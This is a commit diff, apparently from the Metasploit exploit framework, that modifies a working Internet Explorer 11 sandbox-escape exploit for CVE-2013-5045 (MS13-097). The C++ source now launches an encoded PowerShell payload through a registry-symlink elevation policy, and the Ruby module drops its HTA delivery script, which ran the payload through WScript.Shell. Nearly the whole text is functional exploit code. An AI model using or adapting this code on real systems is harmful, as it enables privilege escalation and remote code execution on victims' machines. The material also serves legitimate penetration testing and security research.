sempervictus
diff --git a/‎data/exploits/CVE-2013-5045/CVE-2013-5045.dll
512 Bytes b/‎data/exploits/CVE-2013-5045/CVE-2013-5045.dll
512 Bytes
diff --git a/‎external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp
Lines changed: 3 additions & 3 deletions b/‎external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp
Lines changed: 3 additions & 3 deletions
diff --git a/‎external/source/exploits/IE11SandboxEscapes/make.msbuild
Lines changed: 0 additions & 18 deletions b/‎external/source/exploits/IE11SandboxEscapes/make.msbuild
Lines changed: 0 additions & 18 deletions
diff --git a/‎modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb
Lines changed: 4 additions & 14 deletions b/‎modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb
Lines changed: 4 additions & 14 deletions
@@ -112,8 +112,8 @@ void DoRegistrySymlink()
 			throw 0;
 		}
 
-		CreateRegistryValueString(hKey, L"AppName", L"mshta.exe");
-		CreateRegistryValueString(hKey, L"AppPath", GetWindowsSystemDirectory());
+		CreateRegistryValueString(hKey, L"AppName", L"powershell.exe");
+		CreateRegistryValueString(hKey, L"AppPath", GetWindowsSystemDirectory() + L"\\WindowsPowerShell\\v1.0");
 		CreateRegistryValueDword(hKey, L"Policy", 3);
 
 		bstr_t name = GetSessionPath() + L"\\BaseNamedObjects\\LRIEElevationPolicy_";
@@ -156,7 +156,7 @@ void DoRegistrySymlink()
 		CloseHandle(hSection);
 		hSection = nullptr;
 
-		MyCreateProcess(GetWindowsSystemDirectory() + L"\\mshta.exe", L"mshta.exe " + GetExploitUrl(L"HTA_URL"));
+		MyCreateProcess(GetWindowsSystemDirectory() + L"\\WindowsPowerShell\\v1.0\\powershell.exe", L"powershell.exe " + GetExploitUrl(L"PSH_CMD"));
 	}
 	catch (...)
 	{
 
@@ -74,13 +74,13 @@ def exploit
     rescue Timeout::Error
     end
 
-    session.railgun.kernel32.SetEnvironmentVariableA("HTA_URL", nil)
+    session.railgun.kernel32.SetEnvironmentVariableA("PSH_CMD", nil)
     session.railgun.kernel32.SetEnvironmentVariableA("HTML_URL", nil)
   end
 
   def primer
-    hta_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.hta"
-    session.railgun.kernel32.SetEnvironmentVariableA("HTA_URL", hta_uri)
+    cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
+    session.railgun.kernel32.SetEnvironmentVariableA("PSH_CMD", cmd)
 
     html_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.html"
     session.railgun.kernel32.SetEnvironmentVariableA("HTML_URL", html_uri)
@@ -99,17 +99,7 @@ def primer
   end
 
   def on_request_uri(cli, request)
-    if request.uri =~ /\.hta$/
-      print_status("Sending hta...")
-      hta = <<-eos
-<script>
-var command = "#{cmd_psh_payload(payload.encoded).strip}";
-var shell = new ActiveXObject("WScript.Shell");
-shell.Run(command);
-</script>
-      eos
-      send_response(cli, hta, {'Content-Type'=>'application/hta'})
-    elsif request.uri =~ /\.html$/
+    if request.uri =~ /\.html$/
       print_status("Sending window close html...")
       close_html = <<-eos
 <html>
Original file line number	Diff line number	Diff line change
`@@ -112,8 +112,8 @@ void DoRegistrySymlink()`
`112`	`112`	`throw 0;`
`113`	`113`	`}`
`114`	`114`
`115`		`- CreateRegistryValueString(hKey, L"AppName", L"mshta.exe");`
`116`		`- CreateRegistryValueString(hKey, L"AppPath", GetWindowsSystemDirectory());`
	`115`	`+ CreateRegistryValueString(hKey, L"AppName", L"powershell.exe");`
	`116`	`+ CreateRegistryValueString(hKey, L"AppPath", GetWindowsSystemDirectory() + L"\\WindowsPowerShell\\v1.0");`
`117`	`117`	`CreateRegistryValueDword(hKey, L"Policy", 3);`
`118`	`118`
`119`	`119`	`bstr_t name = GetSessionPath() + L"\\BaseNamedObjects\\LRIEElevationPolicy_";`
`@@ -156,7 +156,7 @@ void DoRegistrySymlink()`
`156`	`156`	`CloseHandle(hSection);`
`157`	`157`	`hSection = nullptr;`
`158`	`158`
`159`		`- MyCreateProcess(GetWindowsSystemDirectory() + L"\\mshta.exe", L"mshta.exe " + GetExploitUrl(L"HTA_URL"));`
	`159`	`+ MyCreateProcess(GetWindowsSystemDirectory() + L"\\WindowsPowerShell\\v1.0\\powershell.exe", L"powershell.exe " + GetExploitUrl(L"PSH_CMD"));`
`160`	`160`	`}`
`161`	`161`	`catch (...)`
`162`	`162`	`{`